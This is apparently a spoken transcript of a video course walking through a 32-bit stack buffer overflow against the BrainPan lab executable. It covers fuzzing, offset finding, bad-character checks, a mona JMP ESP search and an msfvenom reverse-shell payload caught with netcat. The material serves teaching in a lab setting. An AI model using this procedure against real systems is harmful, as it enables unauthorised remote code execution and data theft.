All right, welcome to Buffer Overflow Development how-to. Before we get into that, there's just a few things I want to go over. First things first, let's get our computer set up properly. We'll just go ahead and get in your root access and go in your options. And I want you to go to this GitHub page right here. I'm going to have a link in it, but it's github.com/Linux user 255. Okay, when you're on that page, come down here to this repo. It says Buffer Overflow Dev. Open that up. And here's the different scripts. What you want to do is just go ahead and click on where it says code, highlight that, right click, copy that link there. Go in your options and type git clone. Paste that there. And there it is. It's a lot faster than doing a download, the zip file, etc. Some of you might already have experience dealing with GitHub. Maybe you don't. So let's see, what we want to do then is we're going to cd into Buffer Overflow Dev and look at what we got. Okay, so there's the Python scripts we'll be using, and I'm going to get back to that in a moment. But right now, I'm going to go over some things. We're dealing with buffer overflows, so it's a good idea to know a little background. I don't want to go into too much, but you need to know it. So, all right, well, we've downloaded the repo, and we're going to get to testing for it. So we're going to be working with x86 architecture, also known as 32-bit, and the goal here is essentially hijack the EIP. The EIP is the extended instruction pointer, or just called the instruction pointer. And what that does is it essentially, I'll just give you more. Technically what it is the EIP is a register, and it holds memory address of the next instructions to be executed. So when I move the mouse, type a key, anything like that, that's sending instructions to be executed. So what you want to do is hijack that or override it, or I just like to call hijack it, because once you control the EIP, you control what the computer does. And what you want to do is essentially you're going to point that instruction pointer right at your shell code so that you can execute the exploit and get a reverse shell. So that's about the EIP. Okay, so the architecture itself, the x86. So what it does is it controls instruction types consistent of different operations. One of them is transfer of registers from memory, such as the stack, which we're dealing with right here. This is going to be a stack-based buffer overflow, and this moves large blocks of memory around. The JMP, we're going to deal with that, also called the jump. It's an instruction that conducts instruction transfers. So it has an influence on the EIP, and it changed by changing the flow of executions and altering the EIP, and which is a register. So and that holds memory, and we already talked about what that does. Instruction pointer. It basically instructs the machine what to do next. So down here, line 60, I mean, this is really important. So remember, it's not just knowing how to exploit a vulnerability, but know why it works, and why in that specified manner. Know the how and why, understand your target. And so that's why I went over a little bit of that. I know I might have just gone over it a little quickly. I want to make some extra slides for it as well. So I'm going to include copy of all commands for this lesson and all the other lessons, virtual machines, other resources that you'll need. I'm also including these links, and just going to go look at some of these because I know you're excited to get into this. I was too, but really knowing a little bit of this background before we jump into to debugging this executable, looking at machine code, etc. It's good to know this, have this familiarity. You can this is just a Wikipedia. You can just look at this, get an idea. Program counter, that's the instruction pointer. So you can just read about the instruction address register. Just browse through that if you want. Read it in depth on your own, whatever. x86, this is what the architecture we're dealing with, 32-bit. So you can read about this right here, the x86 assembly language, machine code. We're going to be dealing directly with that. I don't want to scare anyone from this. This is actually it's an easy process. It took me a while the first time I did it. It's what we're doing is basically a 16-step process of debugging this executable, the vulnerable executable, and it has a buffer overflow vulnerability. And like I said, we're going to go through it, debug it, in the attempt to control the instruction pointer. So here's, let's leave it right there. That's your Wikipedia on 32-bit. One of the resources for this was this right here, Guide to x86 Assembly. Definitely won't hurt by reading that. Just get a little familiar with it. I know it looks like really a lot of hardcore computer science stuff, but you don't have to be a professional computer scientist. Here's information on registers. We're dealing with registers in this too, with this Cybersecurity Guides website. So you're going to be seeing EAX, EBX, ECX. You don't really have to know what those are right now, but it's a good idea to know. And right here is the EIP and his thing, the instruction pointer. Right here, special purpose register stores the pointer in the address of the instruction that is currently executing. Making a jump is like adding or subtracting from the instruction pointer. So after each instruction, and this is what we're doing, so you need to know the EIP, what it does, what it is, because our goal is to hijack it. We want to control it. So after each instruction, a value equal to the size of the instruction is added to the EIP, which means the EIP points at the machine code for the next instruction. This simple example shows the automatic addition to the EIP at every step. So EIP plus 1, 53, push the EBX registry, EIP plus 4, and on, and then it goes on to flags. Okay, so those are some websites you need to look at. I can't emphasize enough, especially if this career path is something you really want to go towards, and say exploit development interests you. Maybe you already work in software development. So if you are, then you might already be familiar with machine code, and that's a very low-level language. It's in fact what C was built on. Some of you probably know that already. Essentially, C. We would still be using machine code, I guess, but guys over at Bell Labs wanted something more, I'd say, user-friendly, readable. So that's where the C programming language came from. You got Nix or Unix. So what else should you look at, depending on how good you want to get and how much you want to know? Right there, Windows internals. That's Windows internals part 1, 7th edition. I am recording this right now. It is late July, August. Anyways, depending on when this is published. Anyways, at this recording though, this is summer of 2020, and I have this book. I've read some of it, and I can't show you what's inside it and all that other stuff, all that proprietary material. But I can tell you what you'll learn. You'll learn concepts and tools. First of all, let me tell you why you need to know Windows internals. Okay, if you're going into this profession, and what you're going to do a lot of the times is most of your targets are going to be Windows. You're going to be working in Windows Enterprise. As a matter of fact, we're going to be hacking a Windows domain controller, which is a Windows Server 2016, or I might have us do Windows Server 2019. I don't know. So you need to know everything, the inside and out. Sort of like if you were going to diagnose, if you're going to be a mechanic on a car or look for the weaknesses in a car, you need to be know the car inside and out, like a mechanic or an engineer. So by that same token, with going in depth with those, now with these other tabs right here, this is low level assembly stuff. This is good to know you need to know for buffer overflows and whatnot. But this also goes into not just the low level stuff, but you get to learn about concepts of Windows operating system, tools, and you do this because Windows is going to be your main target most of the time. You'll get an in-depth understanding of system architecture. Now, we're just skimming the surface here with the system architecture, and we're working with the 32-bit, and everyone's on the 64-bit nowadays. You're going to learn with this book, you can learn about process and jobs, things like DLLs, which is dynamic link libraries, .NET. .NET's very important to know because you can write a lot of malware with using .NET and using C# programming language or C++ for DLL hijacking. You're going to learn about common language runtime and memory management. Memory management chapter is huge. And again, we're dealing with a lot of memory management. And that's a lot of what buffer overflows are. Is it's exploiting memory management. You're going to learn about the kernel, the heap, and virtual address space, address translation, the stack. We're manipulating the stack on 32-bit right here. ASLR, now that's something we don't have to deal with right here because this executable overrides that. But ASLR, that's address space layout randomization. And that's a security feature which makes buffer overflows all the more difficult. Which, when you see a demonstration of a 64-bit buffer overflow, usually the first thing that the person has to do is turn off the ASLR, or memory randomization, because otherwise it's the instruction pointers just hopping around all over the place, and so it has no real assigned address value or address space, thereby making it a lot harder to hijack. And then you also learn input output and some Windows security and more. And what some of the industry pros, the top tier professionals, what they recommend, read this book, look at Windows websites, read it, and essentially read between the lines. And they're essentially telling you where and how you can find certain vulnerabilities, almost like looking for bugs. But that's only going to be if you know a tremendous amount about Windows internals. And I'm not there. I mean, my colleagues and I did a B-Sides event earlier this year, and two of our guys, that's what they said, the keynote speakers, just said, hey, we use this book, we've used a lot of experimenting around with this, that, and the other, and so that's enough of me rambling on about that. Went over a brief explanation of what we're going to be working with, instruction pointer, the jump, registers, how we're going to be hijacking the EIP to point it to our shell code. The previous, I showed you slides explaining the buffer overflow and how, you point to the shell code, you get your no ops led, etc. And again, I'm including these references here. And to get this Windows book, I got it on Amazon, so just wherever you buy books. Okay, so there's that. We just showed you how to do a git clone for this right here. And before I actually begin the demo, let's just go ahead and prepare the script. So I'm going to go ahead and we don't need the browser. We can close that. And we don't need this. Okay, now what else do I? Okay, this actually I'm going to keep. I like keeping a little notepad open because you'll see during this, you don't have to do it. Some people don't. I do, just because I like to take notes on where I am in this 16-stage procedure. So it can be easy to get lost, and it's helpful to write them down, actually, like a set of instructions, because think of the 32-bit or x86 buffer overflow development as a formula. I mean, literally, we have a formula where you do pattern create, pattern offset. You're fuzzing the buffer to find out how many bytes it crashes, and then that's when you use those other scripts right here, such as B3 to hijack the EIP, and then with this B4, that's just short for buffer floor. That's going to be the one, once we have everything in place, that's going to be the one that executes the exploit. B5, we're not going to mess with that, because what we're doing is we're using the BrainPan virtual machine, and BrainPan has the executable that we're using to conduct this buffer overflow. So it's basically an executable. It's written in C, compiled, and you can run it on the Linux machine. You can run it on Windows, but we're just going to use it as Windows because, like I said, majority of the time your target is Windows, and so we stop at that fourth script, right? But if you want to go for an all-out, buffer overflow on the, BrainPan VM, it's included in your resources, and you can try it out if you want. But essentially, the reason for doing the buffer overflow exploit dev on the Windows is we got a debugger called Immunity Debugger, and that's where we debug and get the exploit tuned just right. So when it works on the Windows 7 just right, then you can go and apply it onto the Linux machine. So in any event, let's go ahead. I'm going to chmod these right quick. I'm going to do the fuzzer one, the bfuzz. Chmod plus X. And that's a CHA. Okay, there's chmod. Change modifications. Bfuzz, PY. And B1. B2. B3. And we're stopping at B4. Okay, good. Let's just look at some of these, and you'll see what I'm talking about right away while it's still in my mind before I start the demo. Bfuzz dot py. Now this is a series of scripts I found online. It's pretty straightforward here. This is the fuzzer, and what this does is it starts a counter at 100 bytes or in increments by 100 bytes until it reaches 40 or until brainpan, until the executable crashes. And you might recognize this from, I included part of this while loop right here, line 22. That was from one of our while loop examples in the introduction part. So here's your increments. You got your while loop, while length of buffer is less than or equal to max buffer, so long as it's under 4,000, yeah. Then you got your for loop, so for the string in the buffer, and then here's our try except blocks. Remember we just did those. Server, string, sysargv, port. So it's trying to make connections from the script. What it does is trying to connect from Kali Linux to Windows, right? And then you get this index error print. And then this is really big. I'm going to go over this a lot more too. This is socket, all right? Say create a socket. That's socket, so AF init, that implies IPv4. Sock stream is a streaming connection, I believe. Like I said, I'm going to go over that in more detail later. And then here, as connect, so we're trying to connect to it. And if it doesn't, so you got a try block, except, connection failed. So we've actually went right over this try except block here. We were doing it with dividing by 0 and reading files. So that's how that works. So once you fuzz is essentially determine at how many bytes does the executable crash. Does brainpan crash, okay? So now when we go into, let's open up brainpan 1. So vim, that's our buddy for the course. Set number. Okay, now here's the second one. This is a pattern, right? Now we could use this. What this pattern does is you're going to have two other parts to this process. You're going to have pattern create, pattern offset. Now right here we're creating a pattern based on how many bytes the machine crashed. So ideally this is supposed to crash, the executable is supposed to crash at 1,000 bytes. Whatever it crashes at, you take that number minus 100, and that's going to be the actual number that you base this pattern creation on. And you use a pattern create Ruby script. And again, trying to connect us right here. And so if this is I'm going to say ahead of time, this executable is quite buggy. You'll notice a lot of times we'll be running that fuzzer, and it's just going to go nope, it'll stop at 500. So long as it stops, crashes at 700, you'll usually have a decent, experience. It'll actually be a decent exploit, and it'll work. But like I said, ideally it'll crash at 1,000, and you'll base everything off of 900 bytes, which is what that pattern is based off of. Otherwise, you'll be generating the pattern based off of 600 bytes. Okay, so that's your pattern. So the next one, we got brainpan 2. Let's see what that one does. Okay, so this one takes, you see here, it takes the buffer A times, so it's 524. That is supposed to be your offset. So you got to do pattern create, pattern offset, and oh yeah, so that is so the 524 is your pattern generator. And you run the 524 against the debugger. So you run the fuzzer, debugger, okay. So that's this. We'll get more into detail with that. I'll actually have to be conducting an exploit to demonstrate how this 524 plays in. But then times b times 4, 900. Now that's the original where it's supposed to crash. If it crashed at 1,000, that's what you're going to use. Now I have actually been able to leave this 900 alone when it's crashed at 700, and just by that way of thinking, you would think I'd have to put in 600, right? But I've left it at 900 and ended up okay and had a successful exploit. Go figure. And I modified this before according to where it crashed and did not have a successful reverse shell. Okay, so let's look at the next one. B3. This one involves bad characters. Bad characters are characters that will not allow the shell code to render properly. It actually gets into a it's pretty hard to define sometimes, so the way we're going to find them, and with this exploit using immunity debugger, is once we reach this script, okay, we're going to execute this, send all these bad characters to the immunity debugger, and we're going to have to collate, make sure that all of these characters were received by the debugger. Once we know that they are, we're all good, nothing's missing. And I've run this, every time I've run this, this is legit, this works, the script's been put together perfectly. The only bad character we normally have is 00, and that's null. So other noteworthy bad characters are 0A, 0D, and then FF, but those don't cause any problems for us here. Okay, so that's that one. Now, the fourth one, where we're going to stop at. So you're going to generate a payload, okay, based on MSF Venom. And so with that payload, then we will use this. I'm just going to go ahead and tell you what this does right now. So MSF Venom, Windows Shell. So this creates payload, reverse TCP, your port. We're going to use port 443. Put in your IP address, encoded by Shikata Ganai. Just tries to obfuscate it. Minus the byte. It's a bad character. Actually, excuse me. Minus a bad character of X00 and F4 format of Python. And let's scroll down here. Okay, so here we go right here. You see JMP ESP. We just talked about that, the jump. And here's a memory address. You'll see where that pops up later. And here's a payload. And this is little endian. And this is actually put in backwards. And here's our 900 bytes minus 524 for int length of puff x90. And this one, upon successful execution, it's going to go through the try except, and it's going to go through the creating a socket stream IPv4, and will hopefully connect to the server, which will be us. Well, we're telling the Windows machine, the executable, to, hey, connect to Kali. So connect to the server and a port 999, because this is the how we're going to use this. It's we'll type in Python, whatever, B1, B2, whatever, the IP address of the target, and then the port numbers, or number, where you're going to be using 9999. And send the payload. So we connect, the payload is sent, boom, we get a reverse shell. Otherwise, it's just we get a mistake. So hopefully this whole thing runs smoothly. I've got a feeling we're going to be doing a lot of debugging. And I don't mean just with the debugger. We're probably going to do a lot of trial and error with just the fuzzer. And I'm not saying that to put you off. That's just because this executable can be quite buggy. But as I said, if we can get it to crash at 700 bytes or preferably 1,000 bytes, we're good to go. In any event, this is going to be a great learning experience, and I will see you in the next video. Okay, and welcome. Hope you guys watched that previous vid all the way to the end, where I explained each and every Python script, what it does. This little quick vid right here is just going to be, make sure you got everything set up properly. So you've already got your Windows 7 machine and your BrainPan machine. Goal is right now, BrainPan contains an executable. We want to get the executable from BrainPan onto Kali and from BrainPan onto Windows. How do we do that? All right, well, I'm just going to move these aside, and here's what you do. Type in net discover. Now, we can find out the Windows IP easily because we can just go on the command prompt. Okay. All right. I know that this one, 192.168.112 is Windows, and that is 192.168.11, that's BrainPan. So how do we get the executable on the Windows? Well, the fastest, easiest way, come on Google, open up. I'm going to open up the browser, and since we're on the same network, http://192.168.1.11, and you got to go to port 10,000 and /bin/brainpan.exe. So you see that? We could find all this out by nmapping, etc., and enumerating info on this VM, but we don't have to. We just want to get the executable and move on. So there you go. You type that in the URL, or whatever the address is on your host. You might have something different. You might have like a 1.7 or something. All right, but it's going to be port 10,000 /bin/brainpan.exe. Go. I see right here on the bottom. There it is. It's downloaded. I got that little one in there because I've already got another copy. So, all right, BrainPan is on Windows, and you can check. You can go to your downloads, and there they are. Okay, so we got Windows taken care of. What about Linux? What about on our Linux machine? I want to make sure, now hopefully from the previous video you also did a git clone of this buffer overflow repository. Okay, so let's do a git clone. No, not that. Actually, no. Excuse me. wget and http //192.168.1.11 port 10,000 /bin/brainpan.exe. There it is. So this ls pipe to grep brain. Okay, we have the executable here. Okay, there you go. That's how you get BrainPan exe on your Windows machine, and that's how you get it onto your Kali Linux machine. All right, well, hang tight, and I will see you in the next video where we will learn how to find a buffer overflow vulnerability and then develop the exploit using those Python scripts. See you in the next video. Okay, welcome back. Here we go. We're going to start to detect the buffer overflow. How do we do it? Well, we got the BrainPan executable on Kali. We've put it on our Windows VM. Okay, so we're ready to go. Now, before we do it, let's go ahead and open up Immunity Debugger. So go to Windows first, run that as admin, go File, Open, select brainpan.exe, open, see those fields populate. I'm just going to leave that there for now, just like that. Now, okay, there's brainpan.exe. How do you know? Well, we got to run some commands. It's great. Okay, we're learning how to do a buffer overflow, but how do you know how to find one in the first place so that you can exploit it? Okay, so here's what you do. We've downloaded this executable. So let's try this. Let's do strings, use this command, brainpan .exe, and see what we get. Okay, what we're looking for is potential, okay, in this C code, the variable that takes data and does not check the buffer size. And that means it's not going to validate the buffer either. So this is going to allow us to create a buffer overflow fill the stack, crash the target, take control of the program, and then execute the code. Okay, so let's narrow it down a little bit. It's going to be, we're looking for string copy, strcpy. So the way to go about that is, okay, we got strings brainpan.exe. Now we're just going to go space pipe to grep, and we're going to say strcpy. And right there. If you see this out in the wild, I've done this before. A friend of mine, he wrote an executable, an app for an Android, but it was in C#. And same thing, I just took it. So you can do this with any C program. You just put it in the terminal. You run this command against it, and it's not necessarily a yes, indeed, it is a buffer overflow, but this is indicative of one where you got the underscore string copy, imp underscore string copy. Okay, enough of that. Let's move on. So as mentioned in one of my previous videos, this is essentially a 16-stage process, like a formula. So first step, what we need to do is we're going to fuzz the parameters. Well, not necessarily parameters, but we're going to fuzz the buffer. Okay, so how do we do that? Well, we've already got brainpan.exe up here and immunity debugger. See this play button? Hit the play button. Move that out of the way. Actually, we're going to move it right here because we're going to try to crash brainpan program. And when it does, this window right there is going to go blank. Okay. There's our scripts. Now let's go Python and bfuzz.py 192.168.1.12. That's the IP of the Windows machine. And we're doing port 9999. Nope. It's going to take a few times. 700. There it goes. It crashed at 700. I did it earlier. It's supposed to crash at 1000, but I've made it work with this as well. Okay, so we did that. So we crashed it. Now, let's go check immunity debugger. EIP, it's been overwritten with 41s. 41, I believe that's A and ASCII. That's going to come up later on. Let me see here. Move this thing around. Okay. Copy selection clip. You don't have to copy. I'm just doing that because I like to see where I am. I'm going to write ran script 1. I'm just going to say ran B1 EIP. So EIP is now extended instruction pointer. Remember, we already went over all that tech talk with instruction pointers earlier. Okay, so I've got we fuzzed it. EIP is 41, 41, 41 is 441s. So what's step 2? Well, pattern create. What's all that about? Well, talked about that earlier. Let's see. Okay. Over there. I'm going to get rid of this lower box for the moment. Okay, and yes, let me do this here. I forgot. I like to put that in my notes. Okay. I'm going to go up here. Okay. So, we've got to do a pattern create. How do you do that? Well, you got to do locate pattern underscore create. You know what? I've just got the commands. I think I got one of the commands written over here. Okay, locate pattern create. Yep. Okay, here it is. So what you're going to do with this is on the end of it, you're going to run it, and you're going to run a -L, and then you put the bytes, the length of the bytes that it crashed. Now, the bytes that it actually crashed at is if you did crash yours at 1,000 bytes, okay, you're actually going to put in 900. So you're just going to minus 100. That's how this works. So mine crashed at 700, so I'm actually going to put an L, okay, for the byte length. And I'm going to put, see here, I did 700 bytes, so I'm going to put in 600 right here. Now that pattern is going to be used in the next script. So now we're going to open up BrainPan 1. Actually, I'm going to first copy this. As a matter of fact, just to be on the safe side, I will split the terminal again, and I will go into sudo Okay, so we're going to open B1. There's the pattern right there. That is what you would have to have. This is stock. So this is the way these scripts have been written. I found these online. The way these have been written is that if you did indeed, yours ran perfect like it's supposed to, and it crashed at 1,000, this would be the pattern you use. You wouldn't have to, you could still generate a new one. Now this one looks similar. Remember, the pattern is generated based on how many bytes it crashed. Now look at this one in the script here. It ends 1A, 2A. So I'm going to use this one. I'm going to back it up though. Maybe it's silly, but okay. Lets me know where I am. Pattern created. I've not seen anyone else do this, but it helps me. Do what helps you. So, okay, the interesting way of, okay, so that's pattern equals, that's right. Okay. All right. So here's how you got to delete things. Hit the escape, hit the V for visual, up arrow key, do whatever with the arrow key. I'm just going to hit X to get rid of it. Hit the V again for visual. Okay. X to delete. Escape key, I for insert. Tab down a bit. And I'm going to go back and write. I'm in insert mode, so PATTERN equals. Is there anything else in here? No, it's going to be the double quote though. Okay, equals double quote. And now this, copy that again. Put it here. I'm in insert mode. Shift Control V. There you go, new pattern. Now I got to go to the end of there. Put double quotes on that. Okay, this looks okay. Right quit. All right, now that we've generated the new pattern, what do we do? So at this point, we're going to run BrainPan 1. Okay, and we're looking at what it's generating, and let's just see how it goes. Actually, I want to look at this one more time. No. Okay, this is all doing the same thing down here. All right. Okay. B1.py. Oh gosh, forgot. Here we go. Got to restart this right here. Pan. Okay. Open. Administrator. Yes. You have to restart Immunity Debugger every time. Open BrainPan. Okay, everything's there. Got to press the play button. Now we're ready to jump and rock and roll. Okay, let's inspect the results. Okay, so I'm just going to put a little note here. Ran new patterned BrainPan 1.py. Okay. Okay, so the new EIP is right there. You don't have to copy it, but just make note 3, 5, 7, etc. Let me just go EIP after running brainpan1.py is, okay, that in mind. Let's go over here. All right. So we run Python 1, we check the debugger, we got this 35724134, and that's actually what we're supposed to have. Now we got to do a pattern offset, pattern create, pattern offset. Okay. Pattern create, pattern offset. Let's get into that. And I'm going to go ahead and just turn that off right there, and I'll restart in a moment. Okay. So we located EIP. Pattern offset is needed. So here's what we got to do. Locate pattern underscore offset. Okay, there it is. It's in this directory. I'm just going to highlight that. Press the wheel. Okay. Now, don't press anything yet. Here's what you're going to do. At the end of this, we're going to do -q for query. All right. And this is where we're now going to paste that new EIP value. So, yes, definitely keep that EIP. See, I'm glad I actually copied it because I just closed down Immunity Debugger. Okay, so copy that. And, okay, so I'm going to offset this pattern of the EIP. I'm trying to override it. There you go. Okay, great, great, great. Exact match for offset 524. That's what I was looking for. Offset match 524. Good. So I'm going to go ahead and put this in my notes. Now, what we got to do is we just did this pattern offset. We got the 524. Now let's open BrainPan 2. Where's Vim? Where's Vim? Oh, great. Okay. Oh. Yeah, B2. Vim b2.py. Okay. Ooh, so this is the 524. That is our exact offset. We're multiplying that by A, or it's A characters times 524, plus the B characters times 4 B characters. Now there's that 900 there. This is where if it crashed at 1000, you'd be just fine with the 900. By that logic, I should have to put in the 600, right? Because mine crashed at, what, 7? Yeah, mine crashed at 7, so I should be putting in 600 right here. But I'm not. And I know because I've run this before without changing this, and I popped the shell just fine. I've changed this in the past where it makes sense to change it based on where the bytes crashed, but it didn't work. And I have some, I think I know why, but let's get enough talk. Let's do this. Okay. So looking at that, check to see EIP is in here. Okay. Okay. So matter of fact, there you go, yeah. Let's stick with that. All right. So now we got to run Immunity Debugger again. Run as admin. Yes. File. Open. BrainPan. Press play. Go back to Kali. We ran one. We looked at B1. We got the EIP. We offset. I'm just going to make sure I'm not missing anything. Overwrite the EIP. All right, that's what we're doing now. Okay, go back to win, and let's execute it. Now EIP is 42. Copy selection to clipboard. So I'll say after b1.py. No, after brainpan 2, excuse me. EIP. Okie doke. So now those are our B characters. All right. So we're good to go. What we're going to do now is we have to send back characters over, and we're going to send these back characters to the debugger. They're going to be right here on the bottom right hand side, and the point of that is we got to get rid of back characters. We got to make sure they're not in our shell code because they will cause the exploit and the shell code not to render properly. So let's go ahead and run brainpan 3 and come back and check. Before we do that, we're going to need to just restart this, open, run as administrator. Yes. And file, open, brainpan. There's that. I'm going to go ahead and press the play button. So let's go ahead and look at 3, and I'll show you. There's the back characters. We're shipping them on over to the debugger. There you go. All right. So now double check. Yeah, it's playing. It's ready. It's waiting. Okay. Got that done there. So here we go, back characters. Okay, so here's how the back character detection works. You've got to go through and scroll through it all. So it begins right here at 0022F930. I'm just going to go ahead and tell you that they begin at this address and they go down. So the point of this is, let me open this back up. Let me open brainpan 3. Now you see these back characters, goes 1, 2, 3, 4, 5, etc., and it ends at FE, then XFF. So if I just push that over to the side, your job now is you got to collate. Confirm that everything from here on down to where it says FFF or double F. So we saw it started right here at 1, and we got to go down and make sure everything is there. Now, I've never had any issues with this script. It's always worked out just fine. And you're going to read right to left. So you can see right to left up here where it's blue, 1, 0, 2, 0, 3. So that's counting here, because here in the script, you're going left to right like normal. Down here, you're going right to left. That's how it shows up. So, like I said, every time I've gone through here and done this, I've never had any kind of issue with it. Check some more notes. And not seeing anything. Nope. So we're looking for back characters. Reading the bottom right. Okay, so as far as I can tell, everything looks good. All right, so that was, we just ran the third one. So let's see what we got now. We got the back characters. We're not going to close the debugger, not just yet. So now we got to get NASM shell. What's that all about? Well, like I said, we got to get some shell code. So I'm just going to leave that. I'm going to leave that there for now. All right, so locate NASM shell. The point of this, you'll see we're going to get some shell code to manipulate the JMP and ESP. So here's how you got to do. Just going to do like the other ones, locate NASM shell. There it is. Don't be so quick to run it just yet. Okay, so this is going to give us a prompt to create shellcode. Wait for it. Okay, now you got to type in JMP, ESP, and remember the JMP is the it's an instruction that it performs the jumps. It transfers flow of execution, memory, changes the instruction pointer in the registry. So the JMP has direct influence over the instruction pointer. We've already been through all the technicals of it. Okay, good. I was looking for that right there. And I'm going to just highlight all this. I'm going to copy that. See where I am. Okay, b3.py ran no bad chars. Okay, NASM ran. Okay. So you got to quit NASM, you go QUIT. So now that we did NASM shell, we got FFE4. We have to find the JMP address. So let's return to debugger, and we're going to find the JMP ESP address in the debugger using Mona, a Python program. So this one's kind of tricky. I'm just going to include all of these commands along with all the other resources. So down here in the bottom, see this bottom window? You're just going to type this into it. It's exclamation point Mona space find -s, then double quote \xff xe4 and brainpan exe. And this is gonna, you'll see what this does in just a moment. Okay, here we go. Again, a super tiny print. Hopefully we can zoom in. Right here, this is the address, the memory address. No, here's the memory address on the left. This is the message. In any event, there's the address 311.712. That's not what's important. What you want is this, the 0x311712. Yeah, and that is the, everything's so crunched together. And see, there's the XFF XE4, which is what we have down here. Brainpan exe, ASLR, false, etc., etc. So you just want copy to clipboard address. And I'm going to put this ran Mona, all good. Oh, where did Windows go? Where did Mr. Windows go? Here he is. Okay, found a total of 1 pointers. Okay, so now we've done that. What we can do from here is we copy that address, and we're going to exit out of Immunity Debugger. So X that, X this. So we're still in Windows. So now we've got to generate some shell code with MSF Venom. What we could do, we could actually just run brainpan. We're going to actually do this. So where's downloads? We're going to run this as an actual executable. We're going to double click it, and it's going to create a listener or just an open command line prompt, and then we go from there. We're going to throw our execution. But before we do that, let's just move that to the side, actually. Put it over here. And we got to generate a shell code. Shell. So, again, this is pretty lengthy shell code, but I'm going to explain it here. I'm going to put it on my notes first, because if I put it in the terminal, sometimes it will inadvertently execute. Okay, we're using MSF Venom. -P is the payload. we're doing a Windows shell reverse TCP connection, right? The L port is 443. That's what we're listening on. L host, that's your address. My address right here is 192.168.1.6. -E encoder or encoded x86 architecture. Shikata it's a sort of like obfuscation. -B for bad character. We're excluding x00, and -F is format of Python. Okay, so I'm ready to copy paste this into terminal. Move that over to the side. All right, now let me execute that. Just a moment. It's generating shellcode. It should pop up. Okay, there we go. So what's the point of that shellcode? Now we got to insert that into B4, BrainPan 4 Python script. So let's open up and take a look at that. CD BUFFER Overflow Dev. Okay, we're going to vim and let's look at b4.py. So here you go. This is again factory stock. If it crashed when it was supposed to, but let's see, what we generated right here, xb no, that's it looks similar. So what we're going to do is we're going to copy this thing, put it in here. So right here I'm going to put MSF Venom payload success. I'll just say good. And now I'm going to paste that payload. I'm going to put it in two places. Just for redundancy. Copy it right there from the terminal. Paste it there, but that's not exactly where you need it. So it's cool, we got them side by side here. I'm going to go right here. I'm on the right hand side. I'm in the Vim. I'm going to insert mode. Okay, now I'm going to hit escape. I'm going to go V for visual. Now I'm just hitting that down arrow because I'm going to delete all of that. I'm going to hit X. Now that's done. Escape. I'm going to hit I. See where it's supposed to be right here above. Okay, so where the cursor is right here. All right, now let's go ahead and copy what I generated with MSF Venom. Okay. Okay. When you paste it in, make sure you're in insert mode. I hit escape. There, insert mode. Hold down shift control V. Okay. Looks legit. Everything's where it's supposed to be. Let's see. Okay, now let's look at the JMP ESP address. 311.712F3. Okay. Remember I wrote that down. Okay, right here. We found it right there. So that, if you look here, the 311.712F3 is right here. That's the JMP. But look at here, it's because it's a little endian, it's got to go reverse, and it's in byte code format. So you see it starts 3117. Well, here it's going to be starting on the right. It's going to be X31, then X17, X12, X. So whatever the ESP address you get, that's how you have to flip it around. And we had still the payload set up 524. What was that 524 again? Remember, that was a good thing when we found it. That was your offset. So the A characters times your offset of 524 plus the ESP address plus right here in the parentheses 900. That's the original crash point, but you know mine was 600 minus 524, which is the offset, minus 4 integer length of buffer times the bad character or not x90 no op plus the buffer. And we can scroll down. Here's our try and accept the server. Wants to connect. Okay, looks legit. Right, quit. Now, almost ready. The next step. Okay, there's that. And go over here. Now I'm on the right hand side. I'm going to go ahead and start my listener. NC-NLVP. And remember, we're using port 443. Great. Now, time to go back to Windows. Remember, just double click BrainPan. Run it. Okay, waiting for connections. All right. Let's run it. Hope we get a shell. Yes! There you go. Ooh, that felt good. You see that right here? We got a Windows command prompt. Let's see. IP config. Yeah, 192.168.1.12. Who am I? Win user. We can do dir directory. Look at everything in there. So yeah, at this point is when you could go in and extract data or whatnot. So glad that went well. See how a buffer overflow development process works. We saw how even though we didn't get the expected or the perfect generation of the I'll say byte crash area, we still made it work. So, you know, go ahead and look at this again, walk through it step by step, and as you see, it's easy to kind of get tied up a little bit, but there you are. Hope you enjoyed it, and I will see you in the next video.